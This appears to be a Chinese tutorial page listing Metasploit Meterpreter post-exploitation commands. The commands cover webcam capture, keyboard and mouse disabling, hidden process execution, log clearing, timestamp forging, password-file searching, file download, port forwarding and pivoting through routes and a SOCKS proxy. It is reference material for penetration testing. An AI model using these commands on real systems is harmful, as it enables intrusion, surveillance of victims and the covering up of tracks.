再探 Metasploit 持续更新中

一 . 配置环境

系统: kali-linux  1.0     教程:https://www.jianshu.com/p/27ca274b70c8

版本: Framework        Console

二 .  基础知识

三 .  引自 Meterpreter

0 × 01  系统命令

1)基本系统命令

       session      -i        #进入会话    -k     干掉会话

       background    # 将当前会话放置后台

       run    # 执行已有的模块

       info    # 查看已有模块

       getuid    # 查看权限

       getpid    # 获取当前进程的 pid

       sysinfo    # 查看目标机系统信息

       ps    # 查看当前活跃进程

       idletime    # 查看目标机闲置时间

       reboot / shutdown   # 重启 / 关机

       shell    # 进入目标机

2)uictl 开关键盘/鼠标

      uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标

      uictl disable mouse #禁用鼠标        uictl disable keyboard #禁用键盘

3)网络摄像头命令

       webcam_list    # 查看摄像头

       webcam_snap    # 通过摄像头拍照

       webcam_stream     # 通过摄像头开启视频

4)执行可执行文件

       execute   # 在目标机中执行文件

       execute  -H  -i  -f  cmd.exe   # 创建新进程 cmd.exe -H不可见 -i交互  -f  程序

5)迁移进程

       getpid    #获取当前进程的pid

       ps        #查看当前活跃进程

       migrate      #将Metepreter会话移植到制定的pid值的进程中

6) clearev 清除日志

0 x 02   文件系统命令

1)基于文件系统命令

       getwd 或者 pwd    # 查看当前目标机工作目录

       getlwd    # 查看当前本机的工作目录

       ls    # 列出当前目录中的文件

       cd    # 进入目标机指定目录

       lcd    # 进入本机指定目录

       search   -f   *pass*    # 搜索文件

       cat   # 查看指定文件的内容

       upload  # 上传文件到目标机

       download    # 下载文件到本机

       edit    # 编辑或创建文件<创建文件有待在更新版本的msf上测试>

       rm    # 删除文件

       mkdir / rmdir    # 只能在当前目录下创建/删除文件夹

2) timestomp 伪造时间戳

       timestomp   -v   C://2.txt   # 查看时间戳

       timestomp   C://2.txt   -f   C://1.txt     # 将1.txt 的时间戳给 2.txt  

0 × 03 网络命令

1)基本网络命令

       ifconfig / ifconfig

       netstat  -ano

       arp

       getproxy   # 查看代理信息

       route    

2)portfwd端口转发

       portfwd    add   -l   6666  -p  3389   -r   127.0.0.1    #将目标机的3389端口转发到本地的6666

3) 自动添加路由

       run   autoroute   -s   192.168.159.0/24   # 添加到目标环境网关的路由表

        run   autoroute   -p    #查看添加的路由  

4)  SOCKS4A代理

       msf> use  auxiliary / server / socks4a

       msf>  set   srvhost   127.0.0.1

       msf>  set   srvport    1080

       msf>  run

0 × 04  信息收集   <功能强大,会合你胃口>

       插件位置如下

       post/winodws/gather

       post/linux/gather

0 × 05   提权

1)getsystem提权

你可能感兴趣的:(再探 Metasploit 持续更新中)